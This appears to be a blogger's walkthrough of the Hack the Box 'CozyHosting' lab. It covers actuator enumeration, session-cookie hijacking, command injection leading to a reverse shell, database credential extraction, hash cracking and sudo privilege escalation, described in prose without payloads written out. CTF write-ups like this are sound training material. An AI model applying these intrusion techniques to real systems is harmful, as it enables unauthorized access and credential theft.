036#:HTB - CozyHosting
Next up is CozyHosting on Hack the Box. I have been tearing through these rooms the past week so let’s keep it going. I realized halfway through this room that it was also on TJ Null’s OSCP prep list so I get to cross another one of those off my list.
Not much going on, so lets run gobuster and start poking around. Gobuster fails to scan and the site fails to load from just the IP though. Looking at the nmap results again we can see mention of cozyhosting.htb which we should add to our /etc/hosts file.
Much better. We see an info@cozyhosting.htb mentioned that I take note of. In the source code of the login page we discover that it is made using Bootstrap v5.2.3. Searchsploit doesn’t have much here though. I tried some default credentials for bootstrap that didn’t work. I guess I will try to brute force the login page with the one username we have.
To do this, we need some more info. First I faked a login so I could get the error message it produces. Then I opened burpsuite and intercepted a login attempt so I could see what the username/password parameters being passed to the site are.
Hmm, this is taking too long to be the correct path. I tried another go using the whole email address for the info user but that gets us nothing too. I started inspecting request headers in my browser. I am feeling a bit stuck and began revisiting my findings so far. On the /error page we found, there was an unexpected error that was thrown so I googled it.
I see multiple mentions of something called Spring Boot. I began researching what this is and it looks to be some tool for making java apps. Their quickstart guide shows that these apps can be accessed at directories like /hello.
This does make me think I need to run gobuster again though. I got another scan going with a larget wordlist this time.
We got some new hits but they don’t actually work when I navigate to them. I slept on it and returning the next day I am still just as lost. Time for some Guided mode questions.
Well we were on the right track, but it didn’t occur to me to look for wordlists specifically for the app I’m fuzzing. I updated my personal notes so I hopefully don’t forget to try this in the future.
I was having a bit of trouble finding an appropriate wordlist though. After skimming some articles, I found this one which mentions a small wordlist they gathered. They also explained how they gathered it, which is nice.
I just copied and pasted their wordlist before running gobuster again.
Going to that directory reveals some more paths to explore. I began looking at each of these additional pages. We find a kanderson user which is good. There is also some interesting info in /env.
I didn’t find anything particularly damning though, so I checked out the first article in the series I linked a moment ago. This one covers exploiting these Spring Boot actuators we found.
It’s another day and I ran into an odd issue that I wanted to note for this room. I tried to pick up where I left off, but the cozyhosting.htb site won’t load. I scanned it with nmap again and port 80 wasn’t even open!
Not sure what happened there, but the only thing that worked was for me to change VPNs in Hack the Box and load the machine again. Very strange.
Moving on, I ran some hydra attempts with the new username I found while I kept messing with the actuator.
At this point, I am slowly skimming through /actuator/mappings for anything of value. Close to the bottom we run across mention of a /executessh. I tried navigating to cozyhosting.htb/executessh in my browser and got a different error this time.
This isn’t a 404 Not Found error, so I might be able to work with this. I tried pulling it up in Burpsuite but I didn’t learn anything else. Researching the 405 error implies maybe a POST was used for a GET method. After skimming the /mappings page again, I realized I was indeed using GET instead of POST.
Okay, still got an error but a different error. This implies something about my request was incorrect. I looked over the section for it in /mappings but I’m still unsure.
I asked claude.ai if it could help me understand how I am supposed to interact with /executessh. It looks like it is expecting two strings. This began a period of trial and error in burpsuite. The tricky part is that we don’t know what exact parameters are expected, but we can take a guess based on the context of it being /executessh (lets you execute commands over SSH maybe?..).
This isn’t giving us output though and I’m hitting a wall. Let’s do another Guided Mode question.
Okay, so we are on the right track at least. We need to do blind fuzzing I guess to see if I am getting these parameters right. To do this, we will want to use sleep so that there is a noticeable pause before the page loads. This will clue us in to if we passed the right parameter through.
I tried so many different combinations of parameter names and values, it was a pain. I tried combinations like host/cmd, host/command, host/exec, host/run, cmd/host, command/host, exec/host, server/cmd, cmd/server, etc…
I am hitting a wall pretty hard. To make things worse, every time I set it down for the night I get that error with the room where it doesn’t load correctly. I have had to change my VPN profiles about 4 times already for this one room.
Time for some more help. I peaked at cloverphile’s walkthrough just long enough to spot what I did wrong, and it was easy to spot. I had missed the session ID for the kanderson user I found, it just hadn’t clicked for me when I saw it.
Kicking myself for missing that. If we update our JSESSIONID value of our cookies for cozyhosting.htb and reload the page we are now greated with the /admin panel.
Let’s poke around. You may have to replace your cookie’s session ID if it stops working for you. I just had to get the latest one for kanderson out of the /actuator/sessions page. It does look like we found our mystery parameters for /executessh though! I tried localhost and test which gave me an error.
I switched over to Burpsuite so I don’t have to type these in every time while I play with the syntax.
The command failed but we can see it at least tried to run it. I’m a bit rusty with command injection, so I start going through different methods from my notes. I tried chaining commands with && and |. When I tried command substitution, it looks like whoami actually worked.
It looks like the user is named ‘app’. I tried seeing if I could get a reverse shell but I got an error about the username not being able to contain whitespaces. Encoding the payload may help us here. I first attempted URL encoding but it still detected the whitespaces. I googled a way to obfuscate whitespaces and got two results which both seem to work.
I tried a reverse shell again but got another error. I decided to start looking around instead. I found a user named josh in the home folder. The /app folder contains a file named cloudhosting-0.0.1.jar that seems interesting, I’m not sure how to read it though.
I confirmed the webroot appeared to be in /var/www/html/ but I didn’t have permission to write there. It looked like python3 is installed on the victim, so I spun up a python server in the /app directory and used wget to pull the jar file to my machine.
Now that I have the file, I started by just running strings against it. That is a ton of info though so we are going to need to find a way to locate just the good stuff.
I tried grepping pwd, config, admin, database and some others but I’m not finding anything of worth. I searched google for “sensitive spring boot files” and saw that application.yml and application.properties are good targets.
I am struggling to find the actual file on the server though. This method of command execution is horribly inefficient for this too. I decided to try again to get a reverse shell.
I encoded the command with base64, but we are going to need to decode it as well. I played around a bit and found a syntax that works that finally got a shell.
Thank goodness. This has been a tough one for me. I stabilized my shell before using “find” to try to locate application.properties to no avail. I am having trouble getting this file so I just poked around more. In the /var/debconf folder I found some config files to look through. Still nothing though, so time to run linPEAS.
I was going through the results but I kept thinking about that applications.properties file we saw mention of. I haven’t worked with JAR files much. I did a quick search and learned they are basically just zip files. I unzipped the jar and was able to finally read that config file.
I tried switching users to postgres but it failed authentication. I then tried it as the app user’s password which also failed. We did see a josh user in the home folder, so I tried this password there too. This also fails though.
I am probably not trying to log into the right thing here. I googled what to do with a postgres password and learned that I need to try to access the postgres database using this. I see that I can get into the database using a syntax like ” psql -U <username> -d <database_name> -h <hostname> -p <port>”.
Checking the file we found the password in, we get the missing info of port and database name. It said it couldn’t find the database name but after playing with the command I was able to log in by not specifying the database.
I haven’t directly logged into a postgresql database before, so I need to figure out how to navigate here. I googled basic syntax to get around and began slowly working my way through until I discovered the cozyhosting database with the users table inside.
I copied these hashes to a file and cracked one with hashcat.
Awesome, we have a password. There is no admin user to log in as, so I tried this password with josh’s account and got in. This also gets us our first flag.
Checking our sudo rights, we see something interesting that is probably our priv esc path.
Sweet, let’s see what GTFObins recommends. They have a simple command that gets us root and our final flag.
Man, this room was tough for me. The priv esc was easy but I struggled at numerous points with this one. I think this was made worse by the technical difficulties the room was having. It burned a lot of time and wore me down a bit.
The main takeaways I got from this room were that I need to remember to keep an eye out for session cookies, practice command injection more, and that I got some experience working with postgresql databases. While this room was a bit of a slog at times, I’m glad to have the experience under my belt.